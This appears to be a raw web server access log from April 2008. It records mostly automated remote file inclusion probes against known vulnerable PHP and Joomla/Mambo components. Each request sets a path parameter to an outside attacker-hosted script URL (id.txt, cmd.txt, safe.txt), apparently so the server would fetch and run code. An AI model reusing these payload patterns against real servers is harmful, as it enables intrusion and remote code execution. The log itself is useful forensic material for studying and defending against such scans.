72.232.247.138 - - [20/Apr/2008:21:10:18 -0600] "GET /logs/error_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
200.160.251.134 - - [20/Apr/2008:21:12:31 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.160.251.134 - - [20/Apr/2008:21:12:31 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
78.90.30.31 - - [20/Apr/2008:21:12:46 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:12:47 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:12:47 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:12:48 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:12:49 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:12:49 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:13:58 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:13:58 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:13:59 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
75.126.218.14 - - [20/Apr/2008:21:14:05 -0600] "GET /logs/error_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
78.90.30.31 - - [20/Apr/2008:21:14:19 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:14:19 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:21:14:20 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:21:14:49 -0600] "GET /logs/error_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
72.51.46.161 - - [20/Apr/2008:21:15:12 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:21:15:12 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
204.15.120.73 - - [20/Apr/2008:21:15:12 -0600] "GET /logs/error_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
213.246.51.45 - - [20/Apr/2008:21:16:14 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.246.51.45 - - [20/Apr/2008:21:16:14 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.212.16.163 - - [20/Apr/2008:21:18:06 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:18:06 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:18:06 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:20:17 -0600] "GET /logs/access_log.20080330//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
67.195.37.95 - - [20/Apr/2008:21:21:05 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.95 - - [20/Apr/2008:21:21:06 -0600] "GET /logs/access_log.20080203 HTTP/1.0" 404 218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.232.247.138 - - [20/Apr/2008:21:22:14 -0600] "GET /logs/error_log/modules/My_eGallery/index.php?basepath=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:21:22:14 -0600] "GET /modules/My_eGallery/index.php?basepath=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:21:22:14 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
72.232.247.138 - - [20/Apr/2008:21:22:21 -0600] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://kukekaw.fileave.com/id2.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
89.218.85.18 - - [20/Apr/2008:21:22:54 -0600] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
89.218.85.18 - - [20/Apr/2008:21:22:54 -0600] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.212.16.163 - - [20/Apr/2008:21:30:11 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:30:11 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:30:12 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
72.29.70.163 - - [20/Apr/2008:21:30:49 -0600] "GET //skin/zero_vote/error.php?dir=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
72.29.70.163 - - [20/Apr/2008:21:30:49 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
66.212.16.163 - - [20/Apr/2008:21:31:44 -0600] "GET /logs/access_log.20080330//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
72.51.43.85 - - [20/Apr/2008:21:31:51 -0600] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.811"
72.51.43.85 - - [20/Apr/2008:21:31:51 -0600] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
62.141.50.122 - - [20/Apr/2008:21:32:33 -0600] "GET /logs/senetman/html/index.php?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
62.141.50.122 - - [20/Apr/2008:21:32:33 -0600] "GET /senetman/html/index.php?page=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.65"
213.246.51.45 - - [20/Apr/2008:21:32:41 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
213.246.51.45 - - [20/Apr/2008:21:32:42 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
66.212.16.163 - - [20/Apr/2008:21:32:49 -0600] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:32:49 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
66.212.16.163 - - [20/Apr/2008:21:32:49 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.803"
85.25.149.38 - - [20/Apr/2008:21:33:29 -0600] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
85.25.149.38 - - [20/Apr/2008:21:33:29 -0600] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
66.212.16.163 - - [20/Apr/2008:21:35:06 -0600] "GET /logs/access_log.20080330//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
83.230.241.240 - - [20/Apr/2008:21:35:30 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
83.230.241.240 - - [20/Apr/2008:21:35:31 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
72.3.139.246 - - [20/Apr/2008:21:35:56 -0600] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
72.3.139.246 - - [20/Apr/2008:21:35:56 -0600] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
204.15.120.73 - - [20/Apr/2008:21:37:37 -0600] "GET /logs/error_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:21:37:37 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
204.15.120.73 - - [20/Apr/2008:21:37:37 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
72.5.250.201 - - [20/Apr/2008:21:38:38 -0600] "GET /logs/error_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:21:38:38 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
72.5.250.201 - - [20/Apr/2008:21:38:38 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
75.126.218.14 - - [20/Apr/2008:21:41:29 -0600] "GET /logs/error_log.20080330//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:21:41:29 -0600] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.811"
75.126.218.14 - - [20/Apr/2008:21:41:30 -0600] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.811"
87.253.132.5 - - [20/Apr/2008:21:42:00 -0600] "GET /logs/error_log.20080330/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:21:42:00 -0600] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:21:42:01 -0600] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.253.132.5 - - [20/Apr/2008:21:42:14 -0600] "GET /logs/access_log.20080330/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.walex.ch/templates/madeyourweb/.../www?? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:43:45 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:43:46 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:43:46 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:44:10 -0600] "GET /logs/access_log/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:44:10 -0600] "GET /index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
200.230.71.1 - - [20/Apr/2008:21:44:11 -0600] "GET /logs/index.php?_REQUEST=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
195.19.33.141 - - [20/Apr/2008:21:44:38 -0600] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
195.19.33.141 - - [20/Apr/2008:21:44:38 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
72.29.70.163 - - [20/Apr/2008:21:44:47 -0600] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
72.29.70.163 - - [20/Apr/2008:21:44:47 -0600] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
89.218.85.18 - - [20/Apr/2008:21:45:48 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
89.218.85.18 - - [20/Apr/2008:21:45:48 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
204.15.10.228 - - [20/Apr/2008:21:46:41 -0600] "GET /logs/error_log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.810"
216.167.156.20 - - [20/Apr/2008:21:47:42 -0600] "GET /plugins/payment/paymenow/paymenow.inc.php?config%5Broot_dir%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
216.167.156.20 - - [20/Apr/2008:21:47:42 -0600] "GET /logs/plugins/payment/paymenow/paymenow.inc.php?config%5Broot_dir%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
222.255.3.68 - - [20/Apr/2008:21:48:00 -0600] "GET /logs//?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 1740 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
222.255.3.68 - - [20/Apr/2008:21:48:00 -0600] "GET //?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 200 698 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
92.51.130.55 - - [20/Apr/2008:21:48:11 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
92.51.130.55 - - [20/Apr/2008:21:48:11 -0600] "GET //index.php?option=com_custompages&cpage=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
92.51.130.55 - - [20/Apr/2008:21:48:43 -0600] "GET //index.php?option=com_custompages&cpage=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
92.51.130.55 - - [20/Apr/2008:21:48:46 -0600] "GET /logs//index.php?option=com_custompages&cpage=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
203.22.204.88 - - [20/Apr/2008:21:49:21 -0600] "GET /logs/access_log.20080224//admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.76"
203.22.204.88 - - [20/Apr/2008:21:49:21 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.76"
203.22.204.88 - - [20/Apr/2008:21:49:21 -0600] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.76"
203.22.204.88 - - [20/Apr/2008:21:50:36 -0600] "GET /logs/error_log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
203.22.204.88 - - [20/Apr/2008:21:50:56 -0600] "GET /logs/access_log//admin/editor2/spaw_control.class.php?spaw_root=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.76"
209.200.245.189 - - [20/Apr/2008:21:54:54 -0600] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.200.245.189 - - [20/Apr/2008:21:54:54 -0600] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
74.6.22.180 - - [20/Apr/2008:21:55:42 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.25 - - [20/Apr/2008:21:55:45 -0600] "GET /logs/access_log.20080420 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.51.46.161 - - [20/Apr/2008:21:58:01 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pmstudio.net/scan/safeon.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.811"
72.51.46.161 - - [20/Apr/2008:21:58:01 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.pmstudio.net/scan/safeon.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.811"
67.100.12.226 - - [20/Apr/2008:21:58:13 -0600] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
67.100.12.226 - - [20/Apr/2008:21:58:14 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
202.75.197.115 - - [20/Apr/2008:21:58:14 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
202.75.197.115 - - [20/Apr/2008:21:58:20 -0600] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
207.142.16.5 - - [20/Apr/2008:21:58:40 -0600] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://g0tcha.fileave.com/id.txt? HTTP/1.0" 404 267 "-" "libwww-perl/5.53"
207.142.16.5 - - [20/Apr/2008:21:58:40 -0600] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://g0tcha.fileave.com/id.txt? HTTP/1.0" 404 262 "-" "libwww-perl/5.53"
200.62.142.210 - - [20/Apr/2008:21:58:44 -0600] "GET /logs/access_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.76"
83.230.241.240 - - [20/Apr/2008:21:59:44 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.805"
83.230.241.240 - - [20/Apr/2008:21:59:45 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
83.230.241.240 - - [20/Apr/2008:21:59:46 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
80.86.84.169 - - [20/Apr/2008:22:00:03 -0600] "GET //plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 250 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
80.86.84.169 - - [20/Apr/2008:22:00:03 -0600] "GET /logs//plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 255 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
